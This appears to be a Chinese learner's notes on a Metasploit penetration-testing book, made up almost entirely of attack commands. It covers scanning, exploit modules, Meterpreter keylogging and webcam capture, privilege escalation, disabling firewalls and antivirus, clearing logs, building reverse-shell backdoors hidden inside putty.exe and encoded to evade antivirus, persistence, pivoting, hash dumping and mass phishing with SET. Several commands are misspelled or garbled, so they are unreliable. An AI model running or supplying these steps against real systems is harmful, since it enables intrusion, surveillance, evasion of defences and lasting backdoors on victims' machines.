25.《Metasploit渗透测试与开发实践指南》笔记

一、安装VM、在VM中装XP、在VM中装kali

二、data、external、tools、plugins和scripts、exploits、auxiliary、payloads

三、漏洞利用基础
nmap -v -n 192.168.0.103（目标主机IP）
nmap -T4 -A -V 192.168.0.103
msf search dcom 在Metasploit中搜相关服务的漏洞
www.1337day.com / securityfocus/exploitdb 在线查找漏洞
gcc dcom.c -o dcom 下载后编译漏洞代码
./dcom 运行漏洞
./dcom 6 192.168.174.129 对目标主机IP进行攻击
msfconsole /: use exploit/windows/smb/msp8-067-nctapi 选择一个漏洞攻击
show options 查看攻击条件
set RHOST 192.168.0.103 设置目标主机IP地址革RHOST
exploit 攻击！

四、Metterpreter基础
help
sysinfo
screenshot
ps 显示正在运行的进程
migrate 1512 迁移进程ID
getpid 验证进程，被攻击主机当前进程
keyscan_start 启动按键记录器
keyscan_dump
keyscan_stop 停止按键记录
webcam_list 查看摄像头
webcam_snap 摄像头拍照
getuid 被攻击主机名字
shell
mkdir hacked
shutdown -s -t 15 -c "YOU ARE HACKED" 关闭被攻击主机，并显示一条消息

五、漏洞扫描与信息收集
whois 收集域名信息

use auxiliary/gather/search_email_collector    使用邮件收集模块
show options
set domain
run

use auxiliary/scanner/telnet/telnet_version    使用telnet版本扫描器
show options
set RHOSTS 192.168.0.103
run

use auxiliary/scanner/rdp/ms12_020_check    RDP扫描器
set PORTS 3389
set RHOST 192.168.11.46
run

nmap 192.168.11.29
nmap 192.168.11.46 192.168.11.29
nmap -iL /root/Desktop/list.txt    扫描目标列表
nmap -sp 192.168.11.2-60    ping扫描
nmap -PA 192.168.11.46    TCP ACK ping
nmap -pe 192.168.11.46    ICMP回显ping
nmap -R 66.147.244.90    强制DNS反向解析
nmap -sS 192.168.0.104    TCP SYN扫描
nmap -sN 192.168.0.103    TCP空扫描
nmap -scanflags SYNURG 192.168.0.102    自定义TCP扫描
nmap -F 192.168.11.46    快速扫描
nmap -P http 192.168.11.57    基于名称的端口扫描
nmap -r 192.168.11.46    顺序端口扫描
nmap -f 192.168.11.29    报文分析（Fragment Packets）
nmap -sI 192.168.11.29 192.168.11.46    空闲僵尸扫描（Idle Zombie Scan）
nmap -spoof -mac Apple 192.168.11.29    伪造MAC地址
nmap -oN scan.txt 192.168.11.46    保存扫描结果

load nessus    检测漏洞、错误配置、默认凭证
nessus_help
nessus_connect root:toor@localhost:8834 ok  连接本地主机
nessus_policy_list
nessus_new_scan -2 windowsxpSCAN 192.168.0.103  对目标主机扫描
nessus_scan_status
nessus_report_list    检查结果
nessus_report_hosts (report ID)    打开报告
nessus_report_host_ports 192.168.0.103 (report ID)    查看详细信息

db_status
db_import /root/Desttop/scan.xml    导入Nmap报告
hosts 192.168.0.102    从msf访问数据库
services 192.168.0.102    检查开放端口信息
db_import /root/Desktop/Nessus_scan.nessus    导入nessus报告
vulns 192.168.0.103    查看主机漏洞信息

六、客户端漏洞利用（生成恶意链接让被攻击者打开）
use auxiliary/server/browser autopwn 对浏览器攻击
show options
set LHOST 192.168.11.23 攻击者IP
set SRVHOST 192.168.11.23 服务器本地主机地址
set SRVPORT 80 本地端口地址
run 生成恶意UPR，发送给被攻击者
session
session -i 1 选择meterpreter会话对攻击目标执行攻击

use windows/browser/ms10_046_shortcat_icon_dllloader  IE快捷方式图标漏洞攻击
show options
set SRVHOST 192.168.0.109
set SRVPORT 80
set URIDATH 1
exploit
using URL:http://192.168.0.109:80/
session
session -i 1

use  exploit/windows/browser/ms10_022_ie_vbscript_windhlp32  IE恶意VB代码
show options
set SRVHOST 192.168.0.105
set SRVPORT 80
set URIPATH /
exploit
session
session -i 1

七、后漏洞利用
sysinfo
getpid
run checkvm
idletime 检查目标主机是否运行在虚拟机上
run get_env 检查目标主机是否正在运行
ipconfig
route 检查目标主机网络设置
run getcountermeasure 检查目标主机防火墙配置信息
run getgui 检查目标主机远程桌面
run getgui -e
run gettelnet
run gettelnet -e
run get_local_subnets
run hostedit
run hostedit -e 127.0.0.1 www.apple.com 添加host条目
run enum_logged_on_users
run enum_logged_on_users -c
run get_applicatioin_list
run windows/gather/forensics/enum_drives
run windows/gather/enum_ms_product_keys
run window/gather/crodentials/windows_autologin
run winenum 枚举系统信息
cd /root/msf4/logs/scripts/wineum/EXPLOIT_DFE265D 20130327-2532
cat hashdump.txt
run scrapper
cd /.msf4/logs/scripts/scraper/192.168.0.104 2013032756309503
cat services.txt 转储其他枚举脚本攻击提取到的信息

八、后漏洞利用——提权
use exploit/windows/http/minishare_get_overflow 远程缓冲溢出漏洞攻击代码
show options
set RHOST 192.168.0.102
set RPORT 80
show targets
set TARGET 3 设置目标系统类型
exploit

getuid
getsystem -h
getsystem -t 0  实现管理权限
ps

run post/windows/escalate/getsystem  提升权限
run post/windows/oscalate/service_permissions
use exploit/windows/brower/ms10_002_aurora  另一个漏洞攻击msf
show options
set SRVHOST 192.168.0.109
exploit

九、后漏洞利用——清除痕迹
run getcountermeasure 查看防火墙状态
netsh firewall show opmode
net firewall show opmode mode=disaable 禁用防火墙

upload root/Desktop/disable.vbs C:\  使用VB脚本禁用防火墙
cd C:\
disable.vbs

run killav  关闭杀毒软件
tasklist
tasklist /svc  对进程分类
tasklist /svc/find/I "avg"
sc queryex avgwd
sc config avgwd start=disabled  强制关闭杀毒软件进程
clearev  清除日志

十、后漏洞利用——后门
show payloads
cd /opt/metasploit/msf3 查看后门工具
./msfpayload -h
./msfpayload windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 X>root/Desktop/vins.exe
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.105 R | msfencode -e x80/shikataa_nai -c 6 -t exe -x/root/Desktop/putty.exe -o /root/Desktop/viruspcotty.ext 后门程序发送给被攻击者

show encoders  编码器列表
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.105...  后门程序免杀处理

use exploit/multi/handler  当后门发给被攻击者后运行此命令
set PAYLOAD windows/meterpreter/reverse_tcp  设置攻击载荷信息
set LHOST 192.168.0.103
exploit

run metsvc -h  另一个后门程序metsvc
run metsvc -A  启动后门程序
run metsvc -r  删除后门程序

run persistence -h  持久性后门
run persistene -A -L c:\\ -s -x -p 445 i 10 -r 192.168.0.103  持久性后门运行
resource /root/.msf4/logs/persistence/PWNED -02526E0337...

upload /root/Desktop/nc.exe c:...  另一个持久性后门
run reg enumkey -k HKLM\\...
reg setval -k HKLM\\...
reg queryval =k HKLM\\..  netcat运行
netsh firewall add portopening ...
nc -v 192.168.0.107 445  用netcat连接被攻击者

十一、后漏洞利用——跳板与网络嗅探
ipconfig
route
run autoroute -h
run autoroute -s 10.10.10.1/24 添加一条指向目标主机的路由
run autoroute -p 验证是否添加成功
getsystem 提权
run hashdump 转储所有用户的散列密码

use auxiliary/scanner/portscan/tcp  扫描其他地址
show options
set rhosts 10.10.10.1/24
set ports 193,445
set threads 50
run

use exploit/windows/...  开始扫描
set rhost 10.10.10.2
set payload windows/...
exploit

use sinffer  使用嗅探器
sniffer interfaces  枚举网卡
sniffer_start 1
sniffer_dump 1 hacked.pcap  转储抓包
wireshark hacked.pcap

run packetrecorder  另一个嗅探工具
run packetrecorder -1i  抓包保存
run packetrecorder -i 1 -l/root/Desktop

load espia  截屏插件
screengrap

十二、Metasploit漏洞攻击代码研究

十三、使用社会工程学工具包和Armitage
进入SET目录，找到set_config文件，打开set_config文件，设置Metasploit的目录路径，将SENDMAIC设置为ON，EANIL_PROIPER设置为我们使用的软件的名字。安装sendmail程序。启动SET。选1执行后，选5进行邮件群发送

打开终端，输入armitage，之后根据默认一路next
开启扫描，选择Host|MSF scanf，输入IP
选择Hosts|Nmap Scan|Intense Scan,输入IP
选择Attacks|HailMary，开始自动攻击
攻陷后，右击被攻陷系统，选择Meterpreter|Interact。打开终端，输入vncviewer,输入得到的IP和端口，然后可看到被攻击对象的桌面了
选择Explore|browse Files
选择Access|Pump Hashers|scs method.选择View|Credentials，查看传输结果。